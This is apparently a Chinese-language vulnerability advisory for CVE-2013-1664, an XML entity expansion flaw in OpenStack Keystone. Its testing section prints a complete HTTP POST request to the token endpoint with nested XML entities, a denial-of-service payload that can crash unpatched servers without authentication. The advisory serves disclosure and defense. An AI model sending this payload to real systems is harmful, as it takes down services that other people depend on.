发布日期:2013-01-16
更新日期:2013-04-07
受影响系统:
openstack OpenStack Dashboard (Horizon)
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58892
CVE(CAN) ID: CVE-2013-1664
OpenStack是可大规模扩展的云操作系统。
多个OpenStack产品存在安全漏洞,远程未经认证的攻击者可利用这些漏洞使受影响应用崩溃。
<*来源:Jonathan Murray
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Jonathan Murray ()提供了如下测试方法:
DoS keystone servers using XML entities in Keystone requests.
-----------------------------------------------
POST /v2.0/tokens HTTP/1.1
content-type: application/xml
<!DOCTYPE foo [
<!ENTITY a "AAAA lots of As AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvAAAAAAAAAA" >
<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;" >
<!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;" >
]>
<auth>
<tenantName>&c;</tenantName>
<passwordCredentials>
<username>&c;</username>
<username>&c;</username>
<username>&c;</username>
<username>&c;</username>
<password>&c;</password>
<somethingElse>&c;</somethingElse>
<somethingElse1>&c;</somethingElse1>
<somethingElse2>&c;</somethingElse2>
</passwordCredentials>
</auth>
-----------------------------------------------
建议:
--------------------------------------------------------------------------------
厂商补丁:
openstack
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: